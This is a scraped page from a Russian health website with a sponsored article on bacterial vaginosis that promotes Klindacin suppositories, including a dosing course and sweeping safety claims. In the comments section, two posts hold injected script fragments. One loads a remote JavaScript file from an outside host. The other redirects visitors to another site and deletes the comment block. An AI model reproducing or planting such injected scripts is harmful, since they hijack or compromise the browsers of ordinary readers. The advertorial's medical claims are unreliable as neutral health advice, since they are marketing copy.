Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Бактериальный вагиноз и к...  >>  Бактериальный вагиноз и как с ним бороться
 
Обратная связь
 

Бактериальный вагиноз и как с ним бороться

Размер шрифта
26 августа 2014 00:00
  • google_analytics: false
  • Нравится

Влагалище женщины в норме заселено большим количеством полезных бактерий. Они образуют особую микросреду, которая защищает женские половые пути от инфекций.

К сожалению, в ряде случаев целостность этой микросреды нарушается. Природные защитные бастионы рушатся, и сквозь бреши в них устремляются уже другие микробы, болезнетворные. Они приводят к развитию различных заболеваний влагалища. Все они сопровождаются неприятными выделениями. Опытный гинеколог поставит диагноз по характеру выделений так же просто, как дерматолог – по сыпи на коже. Вязкие творожистые выделения – кандидоз (молочница). Желтые пенистые – трихомониаз. Наконец, сероватые выделения с «рыбным» запахом определенно указывают на бактериальный вагиноз, и о нем мы расскажем вам подробнее, поскольку это, пожалуй, самая распространенная проблема.

Болезнь эта вызывается бактерией Gardnerella, поэтому альтернативное название заболевания – гарднереллез. Этот микроб в незначительных количествах присутствует во влагалище и в норме. Что же приводит к его бурной и бесконтрольной экспансии?

Известно, что вагиноз крайне часто развивается у женщин, которые практикуют спринцевание влагалища и активно использую щелочные пенки и гели в гигиенических целях. Чрезмерная гигиена вымывает полезные микроорганизмы, открывая врата влагалищной цитадели перед гарднереллой.

Другие факторы риска – беспорядочные половые связи и климактерические расстройства.

Клинические проявления вагиноза ярко выражены и спутать их с чем-либо сложно. Этот ужасный запах тухлой рыбы, который безжалостно хоронит все ваши самые смелые фантазии и планы на ближайшую ночь.

Что же делать в этом случае?

К счастью для женщин, ученые разработали простой и безопасный курс лечения бактериального вагиноза с помощью препарата под названием Клиндацин. Это лекарственное средство существует в виде вагинальных свечей, поэтому лечение будет точно в цель – местно, в области слизистой влагалища, без системных побочных эффектов. Клиндацин уничтожает молекулярный аппарат, необходимый для синтеза белка бактериальными клетками, что приводит к стремительному разрушению последних. Эффективность препарата подтверждена в многочисленных клинических исследованиях.

Длительность курса варьирует от трех до семи дней по одной свече в день (необходимо вводить во влагалище непосредственно перед сном).

Так что если вагиноз бесцеремонно вмешивается в гармонию вашей сексуальной жизни – вы знаете, что Клиндацин его сможет утихомирить.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:30

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Чем болеет влагалище   Как должно пахнуть у вас между ног   Беременность: как обезопасить себя и будущего малыша от вирусов   Принюхайтесь к соседу! Запах человека говорит о его болезнях!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Что надо знать женщине о своем влагалище
Нереальный секс за 2 недели: первые 7 дней
Перец не даст вас отравить

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.